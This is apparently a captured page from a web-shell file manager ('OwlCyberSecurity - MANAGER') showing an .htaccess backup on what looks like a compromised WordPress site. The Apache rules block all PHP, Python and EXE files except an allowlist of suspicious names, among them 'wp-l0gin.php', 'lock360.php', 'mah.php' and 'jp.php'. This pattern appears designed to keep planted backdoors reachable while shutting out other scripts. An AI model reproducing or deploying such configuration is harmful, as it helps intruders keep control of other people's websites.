OwlCyberSecurity - MANAGER
Edit File: .htaccess_backup_1749090793
# Exclude subdomain folders from restrictions <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / # Skip all rules for subdomain folders RewriteRule ^testthree($|/) - [L] # Add more subdomains here if needed: # RewriteRule ^other-subdomain($|/) - [L] # Original file restrictions (only apply to main domain) </IfModule> # Apply file restrictions only to main domain (not subdomain folders) <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> # Override to allow specific files in main domain only <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php|mah.php|jp.php|ext.php)$"> Order allow,deny Allow from all </FilesMatch> # Main domain rewrite rules <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / # Skip rewrite rules for subdomain folders RewriteRule ^testthree($|/) - [L] # Original rewrite rules for main domain RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>